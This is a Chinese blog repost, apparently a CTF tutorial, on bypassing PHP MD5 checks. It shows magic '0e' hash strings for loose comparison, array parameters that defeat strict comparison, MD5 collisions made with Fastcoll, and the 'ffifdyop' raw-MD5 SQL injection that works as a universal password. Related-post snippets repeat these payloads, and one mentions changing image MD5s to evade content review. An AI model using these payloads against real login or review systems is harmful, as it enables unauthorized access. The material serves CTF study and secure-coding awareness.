MD5绕过的技巧

最新推荐文章于 2025-03-26 23:29:06 发布
最新推荐文章于 2025-03-26 23:29:06 发布
阅读量673 收藏 4
点赞数 1
文章标签: md5 web
原文链接:https://www.cnblogs.com/hacker-snail/p/13955722.html
版权
本文详细探讨了PHP中MD5函数的漏洞,包括弱类型比较导致的安全问题,以及如何通过构造0e开头的字符串进行绕过。同时,也介绍了PHP的强类型比较特性以及数组参数导致的绕过方法。此外,还讨论了MD5碰撞在绕过中的应用,并给出了具体的例子。最后,提到了利用MD5()函数构造SQL注入攻击的场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

引用: https://www.cnblogs.com/hacker-snail/p/13955722.html

MD5函数漏洞

$str1 = $_GET['str1'];
$str2 = $_GET['str2'];
if (md5($str1) == md5($str2)){
die('OK'); }

  • php弱类型比较产生的漏洞

    • 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过

  • 有一些字符串的MD5值为0e开头,这里记录一下

    
240610708

QNKCDZO

s878926199a

s155964671a

s214587387a

s878926199a

s1091221200a

s1885207154a

s1502113478a

s1885207154a

s1836677006a

s155964671a

s1184209335a

s1665632922a

s1502113478a

s1836677006a

s1091221200a

s155964671a

s1502113478a

s155964671a

s1665632922a

s155964671a

s1091221200a

s1836677006a

s1885207154a

s532378020a

s878926199a

s1091221200a

s214587387a

s1502113478a

s1091221200a

s1665632922a

s1885207154a

s1836677006a

s1665632922a

s878926199a

    • 还有MD5和双MD5以后的值都是0e开头的

      • CbDLytmyGm2xQyaLNhWn
      • 770hQgrBOjrcqftrlaZk
      • 7r4lGXCH2Ksu2JNT3BYM

    • PHP特性

      $str1 = $_GET['str1'];
      $str2 = $_GET['str2'];

      if (md5($str1) === md5($str2)) {
      die('OK');
      }

      • 因为是强类型比较,用0e开头的字符串是没办法绕过的了,但是PHP自身的特性使得可以提交一个数组,而md5函数传入数组的返回值都是NULL,这样就可以绕过强类型比较了。所以这里用GET传入?str1[]=1&str2[]=2就行了
        • 补充:md5()或者sha1()之类的函数计算的是一个字符串的哈希值,对于数组则返回false,如果$str1$str2都是数组则双双返回FALSE, 两个FALSE相等得以绕过

      MD5碰撞

      $str1 = (string)$_GET['str1'];
      $str2 = (string)$_GET['str2'];

      if (md5($str1) === md5($str2)) {
      die('OK');
      }

      • 由于强制类型转换,传数组就不可行了,这里就需要MD5碰撞,对于需要两个内容不同但是MD5值相同的文件,使用Fastcoll就可以了

      绕过md5()来构造攻击语句

      select * from 'admin' where password=md5($pass,true)

      • ffifdyop
        • 这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,
          而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是select * from 'admin' where password='' or '6xxxxx'。等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数
    J1NK4
    关注
    PHP中的MD5()函数漏洞
    John_lain的博客
    10-28 3973
    文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] && MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
    ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5
    m0_56691564的博客
    10-18 5661
    MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
    关于MD5函数的绕过
    since_2020的博客
    08-09 1246
    MD5 一、md5($password,true)导致的注入 某次刷题中遇到返回包有这个 HTTP/1.1 200 OK Server: openresty Date: Mon, 09 Aug 2021 10:08:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Hint: select * from 'admin' where password=md5($pass,true) X-Powered-By: PHP/7.3.13
    md5比较绕过
    最新发布
    2401_87508420的博客
    03-26 1065
    一位大佬写的非常好的文章。
    md5绕过
    balalaneng的博客
    01-16 1374
    md5绕过
    MD5绕过
    LYJ20010728的博客
    05-14 9278
    MD5绕过MD5弱类型比较方法一:数组绕过方法二:科学计数法绕过MD5判断扩展构造MD5强类型比较方法一:数组绕过方法二:使用md5加密后两个完全相等的两个字符串绕过哈希长度扩展攻击 MD5弱类型比较 <?php highlight_file(__FILE__); error_reporting(0); $flag = "flag{H3rmesk1t_is_a_loser}"; $val1 = $_GET['val1']; $val2 = $_GET['val2']; if (isset($_GET
    md5一些绕过方法
    m0_56059226的博客
    07-16 2819
    弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199a 0e215962017...
    批量修改图片MD5技巧:如何轻松绕过系统审核
    需要指出的是,虽然技术上可以实现修改图片MD5绕过审核系统,但该行为可能触及到版权、审核规避、内容合规性等法律和道德问题。在多数情况下,使用该技术逃避审核机制可能违反了相应平台的使用条款,甚至可能触犯...
    2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
    2401_84265972的博客
    05-03 1220
    /使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
    最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(1)
    05-04 966
    PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过
    md5绕过字符串
    跳房子的博客
    03-31 825
    md5加密后以0e开头的字符串比较会被认为是科学计数法从而默认弱相等,一些字符串如下 QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848...
    md5绕过总结
    2301_80307383的博客
    07-31 1505
    传入ffifdyop,这个字符串经过md5加密后为276f722736c95d99e921722cf9ed621c。传入ffifdyop后相当于select * from admin where password=''or 1。数组绕过md5($a)===md5($b)&&$a!传入a[]=1&b[]=2即可绕过,数组绕过也可用于弱类型。0e绕过md5($a)==md5($b)&&$a!在转为字符串为'or'6�]��!原理:md5对数组加密结果为NULL。还有要求$a==md5($a)有。
    Web 攻防:PHP特性漏洞 - MD5值比较绕过
    weixin_43320796的博客
    06-02 1324
    md5() 函数计算字符串的 MD5 散列。MD5() 遇到公式,会运算公式,在对公式的值计算 md5 的值。由于 0 和任何数相乘都等于0,所以 0e 开头的任何数MD5都是相同的。科学计数法,大小等价,0e 和 0E 结果相同。格式为:aEb = a × 10^b,即 a 乘以 10 的 b 次幂。
    PHP中MD5加密的简单绕过及基于MD5加密的SQL注入
    Landasika的博客
    12-10 5707
    部分内容参考于: sql注入:md5($password,true)_March97的博客-优快云博客_md5($pass,true) 目录 一、简介 二、基于PHP漏洞的绕过 1、MD5弱比较“==”绕过 2MD5强比较“===”绕过 三、有关SQL注入的MD5绕过 1、起因 2、注入原理 一、简介 md5() 函数计算字符串的 MD5 散列。 MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来..
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包
    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值